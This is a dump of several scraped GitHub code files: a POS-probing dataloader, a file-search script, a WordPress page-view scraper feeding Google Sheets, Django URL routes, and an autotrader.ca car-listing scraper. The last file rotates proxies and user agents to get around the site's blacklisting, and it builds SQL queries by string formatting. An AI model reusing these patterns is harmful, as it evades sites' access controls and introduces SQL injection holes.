enumerate(corpus_split):\n raw_s = article.to_plain_string()\n sent_x, sent_y = self._process_sentence(raw_s, spacy_nlp, tokenizer, emb, args)\n all_x += sent_x\n all_y += sent_y\n if doc_id>0 and doc_id % 1024 == 0:\n self._process_dump(all_x, all_y, cache_dataset_head, dumpcnt, args.task)\n all_x = []\n all_y = []\n dumpcnt += 1\n print (\"Processed {} docs in {:.2f} seconds. 
Cacheing...\".format(doc_id, time.time() - start_time))\n print_memory_usage(f\"docid {doc_id}\")\n self._process_dump(all_x, all_y, cache_dataset_head, dumpcnt, args.task)\n print (\"Finished processing and cached {} docs in {:.2f} seconds.\".format(len(corpus_split), time.time() - start_time))\n\n def _process_dump(self, all_x, all_y, cache_dataset_head, dumpcnt, task):\n all_x_tensors = torch.cat(all_x, dim=0).to(device) # (N, D)\n all_y_tensors = torch.cat(all_y).to(device) # (N,)\n\n if args.task == \"probe\":\n pass \n elif args.task == \"ctarget\":\n rand_y_tensors = torch.LongTensor(np.random.randint(0, len(self.pos_tags), all_y_tensors.shape)).to(device)\n all_y_tensors = rand_y_tensors \n elif args.task == \"crep\":\n all_x_tensors = torch.FloatTensor(np.random.normal(0, 1, all_x_tensors.shape)).to(device)\n else:\n raise ValueError(\"Task {} not accepted!\".format(args.task))\n\n cache_name = os.path.join(cache_dataset_head, f\"{dumpcnt}.pt\")\n with open(cache_name, \"wb+\") as f:\n pickle.dump({\n \"x\": all_x_tensors,\n \"y\": all_y_tensors\n }, f)\n\n return all_x_tensors, all_y_tensors\n\n def _process_sentence(self, raw_s, spacy_nlp, tokenizer, emb, args):\n spacy_tokens = spacy_nlp(raw_s)\n spacy_token_texts = [token.text_with_ws for token in spacy_tokens]\n hf_tokens = tokenizer.tokenize(raw_s)\n clean_hf_tokens = []\n for token in hf_tokens:\n if token.startswith(\"##\"):\n clean_hf_tokens.append(token[2:])\n else:\n clean_hf_tokens.append(token)\n cost, s2h, h2s, s2h_multi, h2s_multi = spacy.gold.align(spacy_token_texts, clean_hf_tokens)\n\n BERT_MAX_LEN = 510\n sent_x = []\n sent_y = []\n\n while len(hf_tokens) > BERT_MAX_LEN:\n hf_tokens_head = hf_tokens[:BERT_MAX_LEN]\n hf_tokens_rem = hf_tokens[BERT_MAX_LEN:]\n h2s_head = h2s[:BERT_MAX_LEN]\n h2s_rem = h2s[BERT_MAX_LEN:]\n h2s_rem = (np.array(h2s_rem) - BERT_MAX_LEN).tolist()\n\n spacy_tokens_head = spacy_tokens[:h2s[BERT_MAX_LEN]]\n spacy_tokens_rem = spacy_tokens[h2s[BERT_MAX_LEN]:]\n s2h_head = s2h[:h2s[BERT_MAX_LEN]]\n s2h_rem = s2h[:h2s[BERT_MAX_LEN]]\n s2h_rem = (np.array(s2h_rem) - h2s[BERT_MAX_LEN]).tolist()\n \n chunk_x, chunk_y = self._align_chunk(hf_tokens_head, h2s_head, spacy_tokens_head, s2h_head, tokenizer, emb)\n sent_x += chunk_x \n sent_y += chunk_y \n\n hf_tokens = hf_tokens_rem \n h2s = h2s_rem \n spacy_tokens = spacy_tokens_rem \n s2h = s2h_rem \n chunk_x, chunk_y = self._align_chunk(hf_tokens, h2s, spacy_tokens, s2h, tokenizer, emb)\n sent_x += chunk_x \n sent_y += chunk_y\n return sent_x, sent_y \n\n def _align_chunk(self, hf_tokens_head, h2s_head, spacy_tokens_head, s2h_head, tokenizer, emb):\n chunk_x = []\n chunk_y = []\n # Ok now that *_head does not overflow\n # Process the doc and alignments\n if self.args.lm == \"bertmulti\":\n hf_indices_head = tokenizer.encode(hf_tokens_head) # list of int\n vecs, _ = emb(torch.tensor(hf_indices_head).unsqueeze(0))\n # vecs is [1, seq_len, ndim]\n elif self.args.lm == \"fasttext\":\n vecs = torch.tensor(np.array([emb.wv[w] for w in hf_tokens_head])).unsqueeze(0)\n else:\n raise NotImplementedError\n \n # Just traverse the spacy tokenization\n # When there is a miss, find the corresponding miss at hf tokenization\n # Handle the missing parts. 
Then repeat at subseq no-miss at spacy sequence\n i, j = 0, -1\n while i < len(s2h_head):\n if s2h_head[i] > 0:\n j = s2h_head[i]\n x = vecs[:, j] # x is tensor of shape (1, d_emb)\n y = self._pos_to_label(spacy_tokens_head[i].pos_)\n chunk_x.append(x)\n chunk_y.append(y)\n i += 1\n else:\n start_i, end_i = i, i+1\n while end_i < len(s2h_head) and s2h_head[end_i] < 0:\n end_i += 1\n if end_i == len(s2h_head):\n break\n i = end_i\n if end_i > start_i + 1: # Multiple spacy misses. Skip them\n j = s2h_head[end_i]\n continue \n else: # Only one spacy miss. Find corresponding hf misses\n # Note1: j corresponds to the *previous* value\n # Note2: end_j will at most be len(h2s_head)\n start_j, end_j = j+1, j+2\n while end_j < len(h2s_head) and h2s_head[end_j] < 0:\n end_j += 1\n x = torch.mean(vecs[:, start_j:end_j], dim=1)\n y = self._pos_to_label(spacy_tokens_head[i].pos_)\n chunk_x.append(x)\n chunk_y.append(y)\n\n return chunk_x, chunk_y \n\n def has_next(self):\n return self.ckpt_ptr < len(self.ckpt_filelist)-1 or self.ptr + self.batch_size <= len(self.x)\n\n def next(self):\n if self.ptr + self.batch_size < len(self.x):\n start = self.ptr \n end = start + self.batch_size \n xbatch, ybatch = self.x[start: end], self.y[start: end]\n self.ptr = end\n elif self.ckpt_ptr < len(self.ckpt_filelist)-1:\n self.ckpt_ptr += 1\n self.x, self.y = self._load_file(self.ckpt_ptr)\n start, end = 0, self.batch_size\n xbatch, ybatch = self.x[start: end], self.y[start: end]\n self.ptr = end \n else:\n return None, None\n return xbatch, ybatch\n\n def _pos_to_label(self, pos_tag):\n if self.args.lang == \"fr\":\n if pos_tag == \"INTJ\":\n pos_tag = \"X\"\n elif pos_tag == \"SYM\":\n pos_tag = \"X\"\n elif self.args.lang == \"es\":\n if pos_tag == \"X\":\n pos_tag = \"INTJ\"\n return torch.LongTensor([self.pos_tags.index(pos_tag)])\n\n def reset(self):\n self.ckpt_ptr = 0\n self.ptr = 0\n self.x, self.y = self._load_file(self.ckpt_ptr)\n\n def _load_file(self, ckpt_ptr):\n with open(self.ckpt_filelist[ckpt_ptr], \"rb\") as f:\n checkpoint = pickle.load(f)\n return checkpoint[\"x\"], checkpoint[\"y\"]\n\n\nclass BaselineTokenizer:\n def __init__(self):\n pass \n\n def tokenize(self, s):\n \"\"\"\n Input: s (a string representation of a sentence)\n Output: tokens (list of string). \n \"\"\"\n return s.split()\n\n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--lm\", type=str, choices=[\"bertmulti\", \"fasttext\", \"glove\"], default=\"bertmulti\")\n parser.add_argument(\"--lang\", type=str, choices=[\"en\", \"es\", \"fr\"], default=\"en\")\n parser.add_argument(\"--task\", type=str, choices=[\"probe\", \"ctarget\", \"crep\"], default=\"probe\")\n\n parser.add_argument(\"--split\", type=str, choices=[\"train\", \"dev\", \"test\"], default=\"dev\")\n parser.add_argument(\"--batch_size\", type=int, default=1)\n args = parser.parse_args()\n \n dl = DataLoader(args.split, args)\n\n print(\"dl.has_next():\", dl.has_next())\n\n print (\"Checking if device is on GPU\")\n x_tensor, y_tensor = dl.next()\n print(\"x_tensor.shape:\", x_tensor.shape)\n print(\"y_tensor.shape:\", y_tensor.shape)\n print(\"x_tensor.device:\", x_tensor.device)\n print(\"y_tensor.device:\", y_tensor.device)\n\n print (\"Checking NaN for this dataset\")\n dl.reset()\n success = True \n while dl.has_next():\n x_tensor, y_tensor = dl.next()\n if x_tensor is None:\n break \n if torch.isnan(x_tensor).sum() > 0:\n print (\"x_tensor has nan entries! 
Stopping!\")\n success = False \n break\n if torch.isnan(y_tensor).sum() > 0:\n print (\"y_tensor has nan entries! Stopping!\")\n success = False \n break\n if success:\n print (\"NaN test passed!\")\n else:\n print (\"NaN test failed!\")\n \n print (\"Compute H(T)\")\n import scipy\n from scipy.stats import entropy\n dl.reset()\n labels = []\n while dl.has_next():\n x_tensor, y_tensor = dl.next()\n if x_tensor is None:\n break\n labels += y_tensor.cpu().numpy().tolist()\n ent = entropy(labels, base=2)\n print (\"H(T)={:.4f}\".format(ent))","repo_name":"SPOClab-ca/InfoProbe","sub_path":"src/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":12629,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39415495281","text":"import os\n\n# Algoritmo para percorrer os arquivos dentro de um caminho de diretórios e localizar um ou mais arquivos a partir do termo procurado.\n\ncaminho_procura = input('Digite um caminho: ')\ntermo_procura = input('Digite um termo: ')\n\n\ndef formata_tamanho(size):\n base = 1024\n kilo = base\n mega = base**2\n giga = base**3\n tera = base**4\n peta = base**5\n\n if size < kilo:\n # na primeira verificação não é necessário manipular o valor de `size`\n texto = 'B'\n elif size < mega:\n size /= kilo\n texto = 'K'\n elif size < giga:\n size /= mega\n texto = 'M'\n elif size < tera:\n size /= giga\n texto = 'G'\n elif size < peta:\n size /= tera\n texto = 'T'\n else:\n size /= peta\n texto = 'P'\n size = round(size, 2)\n return f'{size}{texto}'.replace('.', ',')\n\n\ncontador_de_arquivos = 0\nfor raiz, diretorios, arquivos in os.walk(caminho_procura):\n for arquivo in arquivos:\n if termo_procura in arquivo:\n try:\n contador_de_arquivos += 1\n caminho_completo = os.path.join(raiz, arquivo)\n nome_arquivo, ext_arquivo = os.path.splitext(arquivo)\n tamanho = os.path.getsize(caminho_completo)\n\n print()\n print(f'Encontrei o arquivo: {arquivo}')\n print(f'Caminho: {caminho_completo}')\n print(f'Nome: {nome_arquivo}')\n print(f'Extensão: {ext_arquivo}')\n print(f'Tamanho: {tamanho}')\n print(f'Tamanho formatado: {formata_tamanho(tamanho)}')\n except PermissionError as e:\n print('Sem permissão.')\n except FileNotFoundError as e:\n print('Arquivo não encontrado.')\n except Exception as e:\n print('Erro desconhecido: ', e)\n\nprint()\nprint(f'{contador_de_arquivos} arquivo(s) encontrado(s).')\n\n\n# Quando houver barras invertidas no caminho informado (no caso do Windows) é necessário urilizar o `r` antes da string com o caminho:\n\n# caminho_windows = r'C:\\programs\\anything'\n","repo_name":"renatodev95/curso-python","sub_path":"secao5-modulos-python/os1.py","file_name":"os1.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16091511448","text":"from selenium import webdriver\r\nfrom webdriver_manager.chrome import ChromeDriverManager\r\nfrom time import sleep\r\nimport datetime\r\nimport gspread\r\nimport json\r\nfrom oauth2client.service_account import ServiceAccountCredentials\r\nimport schedule\r\n\r\nmail_username = 'wordpress account mail or username'\r\npassword = 'wordpress account password'\r\nwp_edit = 'https://your URL.dmain/wp-admin/edit.php'\r\n\r\ndate_number = 2\r\ndef check_pv():\r\n scope = ['https://spreadsheets.google.com/feeds','https://www.googleapis.com/auth/drive']\r\n credentials = ServiceAccountCredentials.from_json_keyfile_name('mywp2v-505293b83604.json', 
scope)\r\n gc = gspread.authorize(credentials)\r\n SPREADSHEET_KEY = '1Rs8Q01HwJdBPLrxme60rBSZm5aUR8pm6CkQNZzZ-r9w'\r\n worksheets = gc.open_by_key(SPREADSHEET_KEY).worksheets()\r\n worksheet = worksheets[0]\r\n worksheet2 = worksheets[1]\r\n\r\n options = webdriver.ChromeOptions()\r\n options.add_argument('--headless')\r\n driver = webdriver.Chrome(ChromeDriverManager().install(),options=options)\r\n driver.get(wp_edit)\r\n global mail_username\r\n driver.find_element_by_id('user_login').send_keys(mail_username)\r\n global password\r\n driver.find_element_by_id('user_pass').send_keys(password)\r\n driver.find_element_by_id('wp-submit').click()\r\n global date_number\r\n all_id = driver.find_element_by_xpath('/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/div[1]/div[3]/span[1]').text\r\n all_id = all_id.replace('個の項目','')\r\n title_list = []\r\n id_list = []\r\n pv_list = []\r\n if date_number == 1:\r\n sheet_num = int(all_id) + 1\r\n n = 1\r\n while True:\r\n try:\r\n title_path = f'/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/table/tbody/tr[{n}]/td[1]/strong/a'\r\n id_path = f'/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/table/tbody/tr[{n}]/td[8]'\r\n pv_path = f'/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/table/tbody/tr[{n}]/td[7]'\r\n title = driver.find_element_by_xpath(title_path).text\r\n id = driver.find_element_by_xpath(id_path).text\r\n pv = driver.find_element_by_xpath(pv_path).text\r\n pv = pv.replace(' ビュー','')\r\n print(f'タイトル={title}・ID={id}、PV={pv}')\r\n print(f'n={n}・sheet_num={sheet_num}')\r\n worksheet.update_cell(sheet_num,1,title)\r\n #worksheet2.update_cell(sheet_num,1,title)\r\n worksheet.update_cell(sheet_num,2,id)\r\n #worksheet2.update_cell(sheet_num,2,id)\r\n worksheet.update_cell(sheet_num,3,pv)\r\n if n == 1:\r\n date = datetime.datetime.now().strftime('%m/%d')\r\n worksheet.update_cell(1,3,date)\r\n if n % 50 == 0 :\r\n driver.find_element_by_xpath('/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/div[2]/div[3]/span[2]/a[1]').click()\r\n sleep(1)\r\n n = 0\r\n sheet_num -= 1\r\n n += 1\r\n sleep(2)\r\n except:\r\n break\r\n\r\n else:\r\n sheet_num = int(all_id) + 1\r\n print(sheet_num)\r\n n = 1\r\n column_number = date_number + 2\r\n while True:\r\n try:\r\n title_path = f'/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/table/tbody/tr[{n}]/td[1]/strong/a'\r\n id_path = f'/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/table/tbody/tr[{n}]/td[8]'\r\n pv_path = f'/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/table/tbody/tr[{n}]/td[7]'\r\n title = driver.find_element_by_xpath(title_path).text\r\n id = int(driver.find_element_by_xpath(id_path).text)\r\n pv = driver.find_element_by_xpath(pv_path).text\r\n pv = int(pv.replace(' ビュー',''))\r\n title_list.append(title)\r\n id_list.append(id)\r\n pv_list.append(pv)\r\n title_data = worksheet.cell(sheet_num,2).value\r\n if title_data == id:\r\n worksheet.update_cell(sheet_num,column_num,pv)\r\n else:\r\n worksheet.update_cell(sheet_num,1,title)\r\n sleep(0.5)\r\n worksheet2.update_cell(sheet_num,1,title)\r\n worksheet.update_cell(sheet_num,2,id)\r\n sleep(0.5)\r\n worksheet2.update_cell(sheet_num,2,id)\r\n worksheet.update_cell(sheet_num,column_number,pv)\r\n if n == 1:\r\n date = datetime.datetime.now().strftime('%m/%d')\r\n column_num = date_number + 2\r\n worksheet.update_cell(1,column_num,date)\r\n if n % 50 == 0 :\r\n driver.find_element_by_xpath('/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/div[2]/div[3]/span[2]/a[1]').click()\r\n sleep(1)\r\n n = 
0 \r\n n += 1\r\n sleep(1)\r\n a = date_number + 1\r\n b = date_number + 2\r\n c = date_number + 1\r\n day1_pv = worksheet.cell(sheet_num,a).value\r\n day1 = worksheet.cell(1,a).value\r\n day2_pv = worksheet.cell(sheet_num,b).value\r\n day2 = worksheet.cell(1,b).value\r\n print(f'aは{a}、bは{b}、cは{c}、sheet_numは{sheet_num}')\r\n print(f'day1={day1_pv}、day2={day2_pv}')\r\n day1_pv = int(day1_pv)\r\n day2_pv = int(day2_pv)\r\n day2_day1 = day2_pv - day1_pv\r\n worksheet2.update_cell(sheet_num, c, day2_day1)\r\n date_data = str(day1)+'~'+str(day2)\r\n worksheet2.update_cell(1, c, date_data)\r\n sheet_num -= 1\r\n sleep(1)\r\n except:\r\n break\r\n\r\n date_number += 1\r\n driver.quit()\r\n\r\ncheck_pv()\r\n#schedule.every().day.at('14:50').do(check_pv)\r\n#schedule.every(3).minutes.do(check_pv)\r\n# while True:\r\n# schedule.run_pending()\r\n# sleep(1)\r\n","repo_name":"Mr-SuperInsane/WP2V","sub_path":"main/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75151447208","text":"\nfrom django.conf.urls import url,include\nfrom . import views\nurlpatterns = [\nurl(r'author/', views.authorView.as_view(),name='author'),\nurl(r'authordetail/(?P[0-9]+)',views.authordetail.as_view(),name='authordetail'),\n url(r'bookdetail/(?P[0-9]+)',views.bookdetail.as_view(),name='bookdetail'),\n\nurl(r'',views.Index.as_view(),name='book'),\n\n]\n","repo_name":"krishnapriya-mk/Library-app","sub_path":"books/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26322609027","text":"import queue\nfrom bs4 import BeautifulSoup\nimport mysql.connector\nimport os\nimport time\nfrom threading import Thread, Lock\nfrom datetime import datetime\nimport logging\nimport requests\nimport argparse\nimport random\nimport re\n\ndef get_q(rng):\n\n\tQ = queue.Queue(1000)\n\tfor page in range(0,max_index*100,100):\n\t\turl = \"https://www.autotrader.ca/cars/?rcp=100&rcs={}&srt=33&pRng={}%2C{}&prx=-1&loc=V3J%203S9&hprc=\\\n\t\t\tTrue&wcp=True&sts=New-Used&inMarket=advancedSearch\\\n\t\t\t\".format(page,price_range[rng][0],price_range[rng][1])\n\t\tQ.put(url)\n\n\treturn Q\n\ndef get_proxies(num, wait):\n\n\tos.system('> proxies.txt')\n\tos.system('timeout '+str(wait)+'s '+'proxybroker find --types HTTPS --lvl High --countries US CA --strict -l '+ str(num) +' > proxies.txt')\n\n\twith open('proxies.txt','r') as proxy_file:\n\t\tproxy_list = proxy_file.readlines()\n\n\treturn proxy_list\n\ndef parse_proxies(proxy_list, protocol):\n\tparsed_list = list();\n\tfor proxy in proxy_list:\n\t\tproxy.strip()\n\t\tindex = proxy.find(']')\n\t\tparsed_list.append(protocol+'://'+proxy[index+2:len(proxy)-2])\n\tprint(parsed_list)\n\treturn parsed_list\n\nclass Crawler(Thread):\n\t#class variables\n\theaders = ['Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',\n\t\t 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36',\n\t\t 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36',\n\t\t 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0',\n\t\t 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0',\n\t\t 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/60.0.3112.113 Safari/537.36',\n\t\t 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36',\n\t\t 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134',\n\t\t 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',\n\t\t 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Safari/605.1.15]']\n\n\tconn = mysql.connector.connect(user=os.environ['USER_NAME'], passwd=os.environ['PASSWORD'], host=os.environ['HOST_NAME'],database=os.environ['DATABASE'])\n\tproxies = None\n\ttimout = None\n\n\tdef __init__(self, outside_proxy, main_Q, worker_Q, timeout):\n\t\tThread.__init__(self)\n\t\t#instance variables\n\t\t#connection/page objects\n\t\tself.req = None\n\t\tself.content = None\n\t\tself.bsObj = None\n\t\tself.path = None\n\t\tself.debug = None\n\t\tself.init_proxies(outside_proxy)\n\t\tself.init_timeout(timeout)\n\t\t#page structures\n\t\tself.bsParse = []\n\t\tself.links = []\n\t\tself.vehicles = []\n\t\t#proxy structures\n\t\tself.main_Q = main_Q\n\t\tself.worker_Q = worker_Q\n\n\tdef gather_links(self):\n\n\t\tself.bsParse = self.bsObj.findAll('div', {'class':'listing-details organic'})\n\t\tfor tag in self.bsParse:\n\t\t\tif 'href' in tag.a.attrs: self.links.append('https://www.autotrader.ca'+ tag.a.attrs['href'])\n\n\tdef init_timeout(self, timeout):\n\t\tCrawler.timeout = timeout\n\n\tdef init_proxies(self, outside_proxy):\n\t\tCrawler.proxies = outside_proxy\n\n\tdef update_request(self,link):\n\n\t\tself.req = None\n\t\twhile str(self.req) != '':\n\n\t\t\ttime.sleep(Crawler.timeout)\n\t\t\ttry:\n\t\t\t\tproxy = random.choice(Crawler.proxies)\n\t\t\t\tself.req = requests.get(link,headers={'user-agent':random.choice(self.headers)}, proxies={'https':proxy}, timeout=10)\n\n\t\t\texcept (requests.exceptions.Timeout, requests.exceptions.ConnectTimeout):\n\t\t\t\tprint(\"{} connection timeout using ip: {} ... Dropping from proxies ...\".format(self.getName(), proxy))\n\t\t\t\tif proxy in Crawler.proxies:\n\t\t\t\t\tCrawler.proxies.remove(proxy)\n\t\t\texcept requests.exceptions.RequestException:\n\t\t\t\tprint(\"{} other connection issue using ip: {} ... Dropping from proxies ...\".format(self.getName(), proxy))\n\t\t\t\tif proxy in Crawler.proxies:\n\t\t\t\t\tCrawler.proxies.remove(proxy)\n\t\t\telse:\n\t\t\t\tself.content = self.req.content\n\t\t\t\tself.bsObj = BeautifulSoup(self.content,'lxml')\n\n\t\t\t\tif len(self.bsObj.findAll('head',attrs={'name':'ROBOTS'}))!=0:\n\t\t\t\t\tprint(\"{} blacklisted ip: {} ... 
Dropping from proxies ...\".format(self.getName(), proxy))\n\t\t\t\t\tCrawler.proxies.remove(proxy)\n\t\t\t\t\tself.req = None\n\n\t\t\t\tif len(str(self.content)) <= 1000: self.req = None\n\n\tdef check_page_index(self):\n\t\t#get current page\n\t\tself.bsParse = str(self.bsObj.findAll('script',limit=25)[18:25])\n\t\tstart_index = self.bsParse.rfind('\"CurrentPage\":')\n\t\tcurrent_page = self.bsParse[start_index+15:start_index+18]\n\t\t#get max page\n\t\tstart_index = self.bsParse.rfind('\"MaxPage\":')\n\t\tmax_page = self.bsParse[start_index+11:start_index+14]\n\n\t\tif not current_page or not max_page:\n\t\t\tprint('------------------- NO CURRENT OR MAX PAGE -------------------')\n\t\t\tlogging.warning(\"NO CURRENT OR MAX PAGE\")\n\t\t\tprint('--------------------------------------------------------------')\n\t\t\treturn False\n\t\telse:\n\t\t\tif current_page[-1]==',': current_page = current_page[:-1]\n\n\t\tif current_page[0] == '0':\n\t\t\t#Past last page CurrentPage and Lastpage is 0\n\t\t\treturn True\n\t\telif int(current_page) < int(max_page):\n\t\t\tprint(self.path)\n\t\t\tprint('{} {}'.format(current_page,max_page))\n\t\t\treturn False\n\t\telse:\n\t\t\tprint('{} {}'.format(current_page,max_page))\n\t\t\treturn True\n\n\tdef update_db(self, data):\n\n\t\tcursor = self.conn.cursor()\n\t\tfor row in data:\n\n\t\t\tcur_time = datetime.now()\n\t\t\tformated = cur_time.strftime('%Y-%m-%d %H:%M:%S')\n\t\t\trow['full vehicle'] = row['make']+' '+row['model']+' '+row['year']\n\n\t\t\tvalues = (row['adID'],row['adType'],row['condition'], row['make'], row['model'], row['price'], row['province'],\n\t\t\trow['city'], row['year'], row['kilometres'], row['exterior colour'], row['fuel type'], row['body type'], row['full vehicle'])\n\n\t\t\tsql_autotrader = \"\"\"INSERT INTO main(adID, adType, `condition`, make, model, price, province, city, `year`, kilometers, exterior_color, fuel_type, body_type, full_vehicle)\n\t\t\t\t\t\t\t\tVALUES('%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s');\"\"\"%(values)\n\n\t\t\tsql_turnover = \"\"\"INSERT INTO time(adID, time_entered, time_updated)\n\t\t\t\t\t\t\t VALUES('%s','%s',%s)\n\t\t\t\t\t\t\t ON DUPLICATE KEY UPDATE time_updated = '%s';\"\"\"%(row['adID'],formated,'NULL',formated)\n\n\t\t\tsql_vehicle_image = \"\"\"\n\t\t\t\t\t\t\t\tINSERT IGNORE INTO vehicle_image(full_vehicle, image_path) VALUES('%s',NULL);\n\t\t\t\t\t\t\t\t\"\"\"%(row['full vehicle'])\n\n\t\t\tsql_adjusted_price = \"\"\"\n\t\t\t\t\t\t\t\tINSERT INTO price_change(adID, adjusted_price, time_updated)\n\t\t\t\t\t\t\t\tVALUES('%s', '%s', '%s')\n\t\t\t\t\t\t\t\tON DUPLICATE KEY UPDATE adjusted_price = '%s', time_updated = '%s';\"\"\"%(row['adID'], row['price'], formated, row['price'], formated)\n\n\n\t\t\ttry:\n\t\t\t\tcursor.execute(sql_autotrader)\n\t\t\t\tself.conn.commit()\n\t\t\texcept:\n\t\t\t\tself.conn.rollback()\n\t\t\t\ttry:\n\t\t\t\t\tcursor.execute(sql_adjusted_price)\n\t\t\t\texcept:\n\t\t\t\t\tself.conn.rollback()\n\t\t\telse:\n\t\t\t\tcursor.execute(sql_vehicle_image)\n\t\t\t\tself.conn.commit()\n\n\t\t\ttry:\n\t\t\t\tcursor.execute(sql_turnover)\n\t\t\t\tself.conn.commit()\n\t\t\texcept:\n\t\t\t\tself.conn.rollback()\n\n\t\tcursor.close()\n\n\tdef gather_details(self):\n\n\t\tself.vehicles = []\n\n\t\t#TODO: Include error handling for empty links\n\t\tfor link in self.links:\n\n\t\t\tvehicle_details = {'adID':'','adType':'','condition':'','make':'','model':'','price':'','province':'','city':'',\n\t\t\t\t\t'year':'','kilometres':'','exterior 
colour':'','fuel type':'','body type':''}\n\n\t\t\tself.update_request(link)\n\t\t\t#collect data from gtmManager.initializeDataLayer\n\t\t\tself.bsParse = self.bsObj.findAll('script',limit=3)\n\n\t\t\ttry:\n\t\t\t\tdetails = re.sub('\"','',self.bsParse[2].text)\n\t\t\texcept:\n\t\t\t\tlogging.warning(\"gtmManager.initializeDataLayer method is not available in source for this listing at url: {}\".format(link))\n\t\t\t\tcontinue\n\n\t\t\tdetails = re.split(',|:|{',details)\n\t\t\tdetails = details[:details.index('lists')] + details[details.index('city'):]\n\t\t\tdetails[details.index('city')+1] = re.sub('}','',details[details.index('city')+1])\n\n\t\t\t#collect remaining data from id=\"vdp-specs-content\"\n\t\t\tself.bsParse = self.bsObj.findAll('div',{'id':'vdp-specs-content'})\n\t\t\ttry:\n\t\t\t\tself.bsParse = re.sub('\\\\n|||',' ',str(self.bsParse[0]).lower())\n\t\t\texcept:\n\t\t\t\tlogging.warning('Extra details id=\"vdp-specs-content\" are not available in source for this listing at url: {}'.format(link))\n\t\t\t\tcontinue\n\n\t\t\tself.bsParse = re.split('||',self.bsParse)\n\t\t\tfor item in range(len(self.bsParse)): self.bsParse[item] = self.bsParse[item].strip()\n\n\t\t\tdetails = details + self.bsParse\n\t\t\t#add to vehicle_details dict\n\t\t\tfor key in vehicle_details:\n\t\t\t\tindex = details.index(key)\t\t\t\t\t#TODO: error handling on .index()\n\t\t\t\tvehicle_details[key] = details[index+1]\n\n\t\t\tself.vehicles.append(vehicle_details)\n\n\t\tself.links = []\n\t\treturn self.vehicles\n\n\tdef run(self):\n\n\t\tlast_page = False\n\t\tprint('starting {} ...'.format(self.getName()))\n\t\tself.path = Q.get()\n\t\tself.update_request(self.path)\n\n\t\twhile (last_page==False):\n\n\t\t\tself.gather_links()\n\t\t\tprint('{} gathered link details ...'.format(self.getName()))\n\t\t\tvehicles = self.gather_details()\n\t\t\tprint('{} gathered vehicle details ...'.format(self.getName()))\n\n\t\t\tdb_lock.acquire()\n\t\t\tprint('{} acquired the lock ...'.format(self.getName()))\n\t\t\tself.update_db(vehicles)\n\t\t\tdb_lock.release()\n\t\t\tprint('{} released the lock ...'.format(self.getName()))\n\n\t\t\t#Rotate fresh proxies\n\t\t\t#-----------------------------------------------------------------\n\t\t\tif (len(Crawler.proxies) <= 10) and (proxy_lock.acquire(False)):\n\t\t\t\tprint('{} rotating fresh proxies ...'.format(self.getName()))\n\t\t\t\tlogging.info('{} ROTATING FRESH PROXIES'.format(self.getName()))\n\t\t\t\tself.main_Q.put(True)\n\t\t\t\tfresh_proxies = self.worker_Q.get()\n\t\t\t\tCrawler.proxies += fresh_proxies\n\t\t\t\tproxy_lock.release()\n\t\t\t#-----------------------------------------------------------------\n\n\t\t\tself.path = Q.get()\n\t\t\tself.update_request(self.path)\n\n\t\t\tlast_page = self.check_page_index()\n\t\t\t#stop main loop from listening for fresh proxies\n\t\t\tif last_page: self.main_Q.put(False)\n\t\t\tprint('{} last page is {} ...'.format(self.getName(),last_page))\n\n\nif __name__ == '__main__':\n\t'''\n\tautotrader.ca search returns a maximum of 1000 indices when 100 postiings per page is set. 
